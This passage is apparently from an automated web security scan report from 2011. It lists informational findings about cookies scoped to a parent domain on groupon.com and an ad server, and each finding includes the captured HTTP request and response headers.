Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:13 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: visited=visit_1; path=/; expires=Sun, 09-May-2021 15:38:13 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:13 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/subscriptions/new?division_p=dallas
X-Runtime: 34
Cache-Control: no-cache
Content-Length: 124
Connection: keep-alive

<html><body>You are being <a href="http://www.groupon.com/subscriptions/new?division_p=dallas">redirected</a>.</body></html>

10.58. http://www.groupon.com/learn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /learn

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 200
ETag: "0345c004e46753e8c959a4f64568fdd0"
X-Runtime: 100
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.59. http://www.groupon.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; NREUM=s=1304955365968; visited=visit_1; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.6.9.1304955489618; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:38 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:38 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:38 GMT; HttpOnly
Status: 200
ETag: "0b5465a4051743e698e7fc66860eed29"
X-Runtime: 94
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.60. http://www.groupon.com/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /privacy

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:45 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:44 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:45 GMT; HttpOnly
Status: 200
ETag: "674d83fb859dfa126fff53b15ed631d0"
X-Runtime: 734
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.61. http://www.groupon.com/subscriptions/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: referred_at=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=mbe; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: adchemy_id=q4; path=/
Set-Cookie: conversion_val=; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpcid=q4; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:34 GMT
Set-Cookie: b=fb20b364-7a51-11e0-a127-005056926ae9; path=/; expires=Sun, 09-May-2021 15:35:34 GMT
Set-Cookie: s=fb20c0ac-7a51-11e0-a127-005056926ae9; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=5ab241eb06d51f105c0c22a038766fce; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:34 GMT; HttpOnly
Status: 200
ETag: "52f175b7121fc6cae943527725d56424"
X-S-COOKIE: fb20c0ac-7a51-11e0-a127-005056926ae9
X-B-COOKIE: fb20b364-7a51-11e0-a127-005056926ae9
X-Runtime: 80
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...

10.62. https://www.groupon.com/dallas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /dallas/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:06 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:06 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/dallas/
X-Runtime: 11
Cache-Control: no-cache
Content-Length: 96

<html><body>You are being <a href="http://www.groupon.com/dallas/">redirected</a>.</body></html>

10.63. https://www.groupon.com/learn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /learn

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:24 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:24 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/learn
X-Runtime: 15
Cache-Control: no-cache
Content-Length: 94

<html><body>You are being <a href="http://www.groupon.com/learn">redirected</a>.</body></html>

10.64. https://www.groupon.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.65. https://www.groupon.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/mobile
X-Runtime: 13
Cache-Control: no-cache
Content-Length: 95

<html><body>You are being <a href="http://www.groupon.com/mobile">redirected</a>.</body></html>

10.66. https://www.groupon.com/users  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:13 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/users/new
X-Runtime: 62
Cache-Control: no-cache
Content-Length: 99

<html><body>You are being <a href="https://www.groupon.com/users/new">redirected</a>.</body></html>

10.67. https://www.groupon.com/users/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.68. http://www.tinbuadserv.com/v3/serve.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tinbuadserv.com
Path:   /v3/serve.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v3/serve.php?m=horoscope&c=0&rd=793&l=en&u=http%3A//www.fox8live.com/entertainment/horoscopes/default.aspx&r=http%3A//www.fox8live.com/content/aboutus/default.aspx HTTP/1.1
Host: www.tinbuadserv.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/entertainment/horoscopes/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:40 GMT
Server: Apache
P3P: policyref="http://www.tinbuadserv.com/v3/privacy/p3p.xml", CP="NOI NID DSP COR DEV PSA PSD IVA IVD OTP OUR OTR IND DEM PRE OTC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
